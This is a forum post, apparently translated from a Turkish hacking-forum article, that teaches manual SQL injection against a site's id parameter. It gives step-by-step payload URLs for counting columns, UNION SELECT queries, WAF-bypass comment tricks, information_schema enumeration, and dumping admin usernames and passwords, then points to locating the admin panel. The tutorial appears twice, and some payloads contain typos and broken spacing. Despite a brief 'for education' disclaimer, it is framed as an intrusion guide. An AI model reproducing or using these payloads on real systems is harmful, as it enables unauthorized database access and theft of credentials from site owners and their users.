- 19 Eki 2012
- 961
- 1
// This article is just for education. Responsibility belongs to user.
Manuel SQL Hacking
Attack steps :
1)First, we will learn number of columns.
2)We will reflect the columns.
3)We will take the name of tables.
4)We will take what we want from tables.
Step 1:
Site: examplesite.com/index.php?id=30
End of the adress: (order+by+number- )(Dont forget the - symbol.)
If we see a error like this,
Error: Unknown column 10 in order clause
>> Number of columns is less then 29. We will reduce it step by step.
>>order+by+28- , order+by+27-, order+by+26 , we will reduce it until web site back to the normal.
>> order+by+25- (If web site turn back to the normal in 25, this means our column number is 25. )
Step 2:
We will write to end of URL (+union+select+columns-) (We will add - to end of site. Dont forget it.)
Now, some numbers will rebound to the screen. We will choose one of them and continue. If numbers dont rebound, we need bypass.
>>Bypass
Step 3:
Choose one of the rebound numbers. For example 10.
We learning name of database with this command.
We learning version of database with this command.
information_schema.tables = Shows name of tables that in database
>>Then we write this command instead of schema.tables.
information_schema.columns = Shows name of columns that in database.
We learn name of tables with this command. Send this command, then name of tables will rebound to the screen.
Example table names: admin, places,activities
We will pay attention to admin.
Step 4:
-We will take data of admin.
After send this command, well learn name of columns that in table.
Example: User
Password
E-mail
Phone number
We need User and password
We *******ing the page with writing this code.
And datas of user and password, will rebound to screen.
At last, you must find the admin panel. You can use Intelli Tamper for this.
Source user: AquieLL
This is a part of this Turkish article: http://www.turkhackteam.org/web-ser...um-yontemler-manuel-havij-sqlmap-aquiell.html
Manuel SQL Hacking
Attack steps :
1)First, we will learn number of columns.
2)We will reflect the columns.
3)We will take the name of tables.
4)We will take what we want from tables.
Step 1:
Site: examplesite.com/index.php?id=30
End of the adress: (order+by+number- )(Dont forget the - symbol.)
Kod:
>> examplesite.com/index.php?id=30+order+by+29-
Error: Unknown column 10 in order clause
>> Number of columns is less then 29. We will reduce it step by step.
>>order+by+28- , order+by+27-, order+by+26 , we will reduce it until web site back to the normal.
>> order+by+25- (If web site turn back to the normal in 25, this means our column number is 25. )
Step 2:
We will write to end of URL (+union+select+columns-) (We will add - to end of site. Dont forget it.)
Kod:
[url]www.examplesite.com/index.php?id=30[/url] End of URL
Kod:
[url]www.examplesite.com/index.php?id=30+union+select+1+2+3+4+5+...23+24+25-[/url]
>>Bypass
Kod:
1) Normal: +union +select+1,2,3,4,5,6,7,25
Bypass: +/*!union*/+/*!select*/+1,2,3,4,5,6,7,25
2) Normal:+union +select+1,2,3,4,5,6,7,25
Bypass: +union +(select+1,2,3,4,5,6,7,25)
3) Normal:+union +select+1,2,3,4,5,6,7,25
Bypass: +#union# +#select#+1,2,3,4,5,6,7,25
Step 3:
Choose one of the rebound numbers. For example 10.
Kod:
A-)[url]www.examplesite.com.com/index.php?id=30+union+select+1,2,database(),3,4,5[/url], 6,7,8,..,24,25-
Kod:
B-)[url]www.examplesite.com/index.php?id=30+union+select+1,2,version(),3,4,5,6[/url] ,7,8,..,24,25-
Kod:
C-)[url]www.examplesite.com/index.php?id=30+union+select+1,2,group_contact(tab[/url] le_name),4,5,6,7,8,...,24,25+from+information_sche ma.tables-
information_schema.tables = Shows name of tables that in database
>>Then we write this command instead of schema.tables.
information_schema.columns = Shows name of columns that in database.
Kod:
D-)www.examplesite./index.php?id=30+union+select+1,2,group_concat(table_name),4,5,...,24,25+from+i nformation_schema.tables+where+tables_schema=database()
Example table names: admin, places,activities
We will pay attention to admin.
Step 4:
-We will take data of admin.
Kod:
www.examplesite.com/index.php?id=30+union+select+1,2,group_concat(CoLumn_Name),4,5,6,7,8+fr om+information_schema.CoLumns+where+TabLeS_schema= database()+and+TabLe_Name=admin
Example: User
Password
Phone number
We need User and password
Kod:
www.examplesite.com/index.php?id=30+union+select+1,2,group_concat(user,password),4,5,6,7,8+ from+admin
And datas of user and password, will rebound to screen.
At last, you must find the admin panel. You can use Intelli Tamper for this.
Source user: AquieLL
This is a part of this Turkish article: http://www.turkhackteam.org/web-ser...um-yontemler-manuel-havij-sqlmap-aquiell.html